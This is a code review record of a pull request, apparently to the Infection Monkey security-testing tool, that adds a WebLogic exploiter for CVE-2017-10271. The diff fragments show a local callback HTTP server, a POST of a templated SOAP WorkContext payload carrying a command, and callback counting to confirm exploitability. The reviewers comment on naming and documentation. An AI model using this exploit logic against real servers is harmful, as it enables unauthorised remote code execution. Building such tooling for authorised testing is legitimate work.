### PR TITLE
Web logic with framework

### PR DESCRIPTION
**Pull request by VakarisZ**
# Feature / Fixes
> Implements Oracle WebLogic vulnerability trough web_rce framework
CVE: https://nvd.nist.gov/vuln/detail/CVE-2017-10271

### CODE REVIEW

File: infection_monkey/exploit/weblogic.py [hunk 1]
```diff
@@ -0,0 +1,174 @@
...
+    def check_if_exploitable(self, url):
+        # Server might get response faster than it starts listening to it, we need a lock
+        lock = threading.Lock()
+        local_port = get_free_tcp_port()
+        local_ip = get_interface_to_target(self.host.ip_addr)
+        httpd = WebLogicExploiter.HTTPServer(local_ip, local_port, lock)
+        httpd.daemon = True
+        lock.acquire()
+        httpd.start()
+        lock.acquire()
```
Comment (itaymmguardicore) [inline infection_monkey/exploit/weblogic.py]: Export to function the part from 'local_port = ...' up to this line. You can name it _start_http_server or something

File: infection_monkey/exploit/weblogic.py [hunk 2]
```diff
@@ -0,0 +1,174 @@
...
+            self._stopped = True
+            return
+
+    def check_if_exploitable(self, url):
+        # Server might get response faster than it starts listening to it, we need a lock
+        lock = threading.Lock()
+        local_port = get_free_tcp_port()
+        local_ip = get_interface_to_target(self.host.ip_addr)
+        httpd = WebLogicExploiter.HTTPServer(local_ip, local_port, lock)
+        httpd.daemon = True
```
[the remark this answers is not in the document]
Comment (VakarisZ) [reply infection_monkey/exploit/weblogic.py]: This method was made by modifying create_transfer from exploit/tools.py

File: infection_monkey/exploit/weblogic.py [hunk 3]
```diff
@@ -0,0 +1,174 @@
...
+            post(url, data=payload, headers=HEADERS, timeout=REQUEST_TIMEOUT, verify=False)
+        except exceptions.ReadTimeout:
+            pass
+        except Exception as e:
+            LOG.error("Something went wrong: %s" % e)
+
+        lock.release()
+        httpd.join(SERVER_TIMEOUT)
+        httpd.stop()
+        if httpd.get_requests > 0:
```
[the remark this answers is not in the document]
Comment (VakarisZ) [reply infection_monkey/exploit/weblogic.py]: I don't know how I did not see that :/

File: infection_monkey/exploit/weblogic.py [hunk 4]
```diff
@@ -132,43 +103,81 @@ def stop(self):
...
-        if httpd.get_requests > 0:
-            exploited = True
-        else:
-            exploited = False
-        return exploited
+        return True
+
+
+    @staticmethod
+    def exploit_payload(cmd_base, cmd_opt, command):
```
Comment (itaymmguardicore) [inline infection_monkey/exploit/weblogic.py]: rename to 'get_exploit_payload' (or 'generate_exploit_payload' or anything along this line)
exploit is also a verb so the function name is a bit confusing

Comment (itaymmguardicore) [inline infection_monkey/exploit/weblogic.py]: add brief documentation

File: infection_monkey/exploit/weblogic.py [hunk 5]
```diff
@@ -132,43 +103,81 @@ def stop(self):
...
+                    </work:WorkContext>
+                  </soapenv:Header>
+                  <soapenv:Body/>
+                </soapenv:Envelope>
+                '''
+        payload = empty_payload.format(cmd_base=cmd_base, cmd_opt=cmd_opt, cmd_payload=command)
+        return payload
+
+    @staticmethod
+    def test_payload(ip, port):
```
Comment (itaymmguardicore) [inline infection_monkey/exploit/weblogic.py]: rename to get_test_payload

File: infection_monkey/exploit/weblogic.py [hunk 6]
```diff
@@ -132,43 +103,81 @@ def stop(self):
...
+    def _stop_http_server(self, httpd, lock):
         lock.release()
         httpd.join(SERVER_TIMEOUT)
         httpd.stop()
-        if httpd.get_requests > 0:
-            exploited = True
-        else:
-            exploited = False
-        return exploited
+        return True
```
Comment (itaymmguardicore) [inline infection_monkey/exploit/weblogic.py]: What's the point of this return? If there's no point, just remove it

File: infection_monkey/exploit/weblogic.py [hunk 7]
```diff
@@ -132,43 +103,81 @@ def stop(self):
...
             post(url, data=payload, headers=HEADERS, timeout=REQUEST_TIMEOUT, verify=False)
         except exceptions.ReadTimeout:
+            # Our request does not get response thus we get ReadTimeout error
             pass
         except Exception as e:
             LOG.error("Something went wrong: %s" % e)
+        self._stop_http_server(httpd, lock)
+        return httpd.get_requests > 0
 
+    def _start_http_server(self):
```
Comment (itaymmguardicore) [inline infection_monkey/exploit/weblogic.py]: document

File: infection_monkey/exploit/weblogic.py (hunk 5 above)
Comment (itaymmguardicore) [inline infection_monkey/exploit/weblogic.py]: add brief documentation

**Pull request closed without merging**